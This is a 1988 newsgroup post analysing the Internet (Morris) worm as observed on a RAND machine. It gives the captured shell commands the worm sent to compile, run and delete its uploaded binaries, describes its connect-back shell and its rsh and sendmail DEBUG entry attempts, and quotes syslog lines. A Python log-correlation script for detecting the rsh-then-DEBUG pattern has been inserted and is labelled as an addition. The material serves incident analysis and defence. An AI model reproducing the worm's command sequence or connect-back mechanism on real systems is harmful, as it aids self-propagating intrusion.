[comp.protocols.tcp-ip] Details on the Internet VIRUS

salzman@RAND.ORG (Isaac) (11/04/88)

After carefully leaving the sendmail ``hole'' open on our Internet machine
I've been able to track (for the most part) what the virus is doing and
how it's spreading itself.

The C program that is uploaded and compiled is only the start.  After it's
compiled it's run with the following arguments: argv[1] is the Internet
addr of the infecting host, argv[2] is the port to connect to on that host
and argv[3] is the "magic" number. It connects back to the infecting host
and *carefully* transfers 3 files over.  The socket remains open and
/bin/sh is then exec'd so the infecting host can send shell commands to it
after the files are transferred. Following is an excerpt from the log file of
my hacked up version of the .c file that's uploaded:

  virus: pid=6828, args; x15886501 10.4.0.7 29451 15525687
  connection on sockect 0 active
  trying to write to file 'x15901447,sun3.o', len=47165
  file 'x15901447,sun3.o' written!
  trying to write to file 'x3338475,vax.o', len=45734
  file 'x3338475,vax.o' written!
  trying to write to file 'x11091853,l1.c', len=1542
  file 'x11091853,l1.c' written!
  starting up 'snoop' to watch the rest of the socket

"Snoop" is a shell script that's run in place of /bin/sh to capture the
shell commands that are being sent from the infecting host. Following is a
log of the shell commands that are being sent:

  PATH=/bin:/usr/bin:/usr/ucb
  rm -f sh
  if [ -f sh ]
  then
  P=x10903971
  else
  P=sh
  fi
  cc -o $P x15901447,sun3.o

  ./$P -p $$ x15901447,sun3.o x3338475,vax.o x11091853,l1.c

  rm -f $P
  cc -o $P x3338475,vax.o

  ./$P -p $$ x15901447,sun3.o x3338475,vax.o x11091853,l1.c

  rm -f $P
  rm -f x15901447,sun3.o $P
  rm -f x3338475,vax.o $P
  rm -f x11091853,l1.c $P

The real key is to find out what ./$P is actually doing. Knowing the
arguments to the program that's uploaded and executed may be 1/2 the battle
there - especially if you're running on a Sun 3 with SunOS 4.0 (let's thank
Sun for the "trace" command).  So it's starting itself again, probably
using the pid ($$) as random seed, the rest of the arguments being the
names of the files to send off to the next victim. It looks real innocent
when you see "(sh)" in a ps listing (note what $P is set to)....

Earlier today Jim Gillogly (jim@rand.org) was able to find a table of
potential passwords that are probably used to crack accounts on the
infected machine. Some other research into the matter strongly suggests
that .rhosts and hosts.equiv files are used to target the next victim (that
seems to be common knowledge). It apparently tries one of two ways to break
into a machine. First it seems to try the rsh port. I've hacked up rshd to
report all outside attempts via syslog. It would consistently come in over
rsh a minute or so before trying the SMTP port. Terry West (terry@rand.org)
hacked sendmail to report attempts to use the 'debug' command to the SMTP
server and log that with syslog as well, so we get stuff like this:

  Nov  3 18:10:12 rand-unix rsh[4311]: external address detected port=2,fam=1008,addr=10.4.0.7
  Nov  3 18:10:43 rand-unix sendmail[4328]: AA04328: DEBUG set from: SM.UNISYS.COM
  Nov  3 18:43:08 rand-unix rsh[5106]: external address detected port=2,fam=1021,addr=10.2.0.10
  Nov  3 18:43:41 rand-unix sendmail[5126]: AA05126: DEBUG set from: XN.LL.MIT.EDU
  Nov  3 18:55:59 rand-unix rsh[5377]: external address detected port=2,fam=991,addr=128.52.32.14
  Nov  3 18:57:18 rand-unix sendmail[5421]: AA05421: DEBUG set from: XN.LL.MIT.EDU
  Nov  3 19:03:56 rand-unix rsh[5652]: external address detected port=2,fam=1015,addr=10.4.0.7
  Nov  3 19:29:34 rand-unix rsh[6725]: external address detected port=2,fam=1003,addr=10.4.0.7
  Nov  3 19:48:14 rand-unix rsh[7592]: external address detected port=2,fam=996,addr=10.4.0.7
  Nov  3 19:48:46 rand-unix sendmail[7614]: AA07614: DEBUG set from: SM.UNISYS.COM
  Nov  3 19:55:50 rand-unix rsh[7698]: external address detected port=2,fam=1018,addr=10.6.0.94
  Nov  3 19:56:25 rand-unix sendmail[7712]: AA07712: DEBUG set from: UXC.CSO.UIUC.EDU
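The rsh-then-SMTP-DEBUG sequence above is a usable detection signal on its own. What follows is an added example, not code from the post: it parses the syslog lines in the format the patched rshd and sendmail emit above, pairs each external rsh attempt with the SMTP DEBUG that follows it within a short window, and lists rsh attempts that never got a DEBUG follow-up. The sample log is a constructed subset of the lines quoted above; the 120-second window is an assumption based on the "a minute or so" gap reported.

```python
import re

# Constructed sample, taken from the syslog excerpt quoted above: the patched
# rshd logs external rsh attempts, the patched sendmail logs SMTP DEBUG use.
SAMPLE_LOG = """\
Nov  3 18:10:12 rand-unix rsh[4311]: external address detected port=2,fam=1008,addr=10.4.0.7
Nov  3 18:10:43 rand-unix sendmail[4328]: AA04328: DEBUG set from: SM.UNISYS.COM
Nov  3 18:55:59 rand-unix rsh[5377]: external address detected port=2,fam=991,addr=128.52.32.14
Nov  3 18:57:18 rand-unix sendmail[5421]: AA05421: DEBUG set from: XN.LL.MIT.EDU
Nov  3 19:03:56 rand-unix rsh[5652]: external address detected port=2,fam=1015,addr=10.4.0.7
Nov  3 19:29:34 rand-unix rsh[6725]: external address detected port=2,fam=1003,addr=10.4.0.7
Nov  3 19:48:14 rand-unix rsh[7592]: external address detected port=2,fam=996,addr=10.4.0.7
Nov  3 19:48:46 rand-unix sendmail[7614]: AA07614: DEBUG set from: SM.UNISYS.COM
"""

# One pattern per patched daemon; syslog carries no year, so only the
# time of day is kept (fine for gaps of a minute or two within one day).
RSH_RE = re.compile(r"^\w{3}\s+\d+ (\d\d):(\d\d):(\d\d) \S+ rsh\[\d+\]: "
                    r"external address detected .*addr=(\S+)")
SMTP_RE = re.compile(r"^\w{3}\s+\d+ (\d\d):(\d\d):(\d\d) \S+ sendmail\[\d+\]: "
                     r"\S+ DEBUG set from: (\S+)")

def parse_events(text):
    """Yield (seconds_since_midnight, kind, peer) with kind 'rsh' or 'debug'."""
    for line in text.splitlines():
        for kind, rx in (("rsh", RSH_RE), ("debug", SMTP_RE)):
            m = rx.match(line)
            if m:
                h, mi, s, peer = m.groups()
                yield int(h) * 3600 + int(mi) * 60 + int(s), kind, peer

def correlate(text, window=120):
    """Pair each external rsh attempt with the first SMTP DEBUG that follows it
    within `window` seconds and before the next rsh attempt; rsh attempts that
    never get a DEBUG follow-up are returned separately (still worth a look)."""
    pairs, unpaired, pending = [], [], None
    for t, kind, peer in parse_events(text):
        if kind == "rsh":
            if pending:
                unpaired.append(pending[1])
            pending = (t, peer)
        elif pending and t - pending[0] <= window:
            pairs.append((pending[1], peer, t - pending[0]))
            pending = None
    if pending:
        unpaired.append(pending[1])
    return pairs, unpaired
```

Note that the rsh record carries the peer address while the sendmail record carries a host name, so the pairing here is by time order only, not by matching the two peers.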

So that's the scoop, so far. Of course by the time this makes it out to
the tcp-ip list this will be old news, eh? :-) Now to tear apart the
fake "sh"..... Ciao! 

--
* Isaac J. Salzman                                            ----     
* The RAND Corporation - Information Sciences Dept.          /o o/  /  
* 1700 Main St., PO Box 2138, Santa Monica, CA 90406-2138    | v |  |  
* AT&T: +1 213-393-0411 x6421 or x7923 (ISL lab)            _|   |_/   
* ARPA: salzman@RAND.ORG or salzman@rand-unix.ARPA         / |   |
* UUCP: ...!{cbosgd,decvax,sdcrdcf}!randvax!salzman        | |   |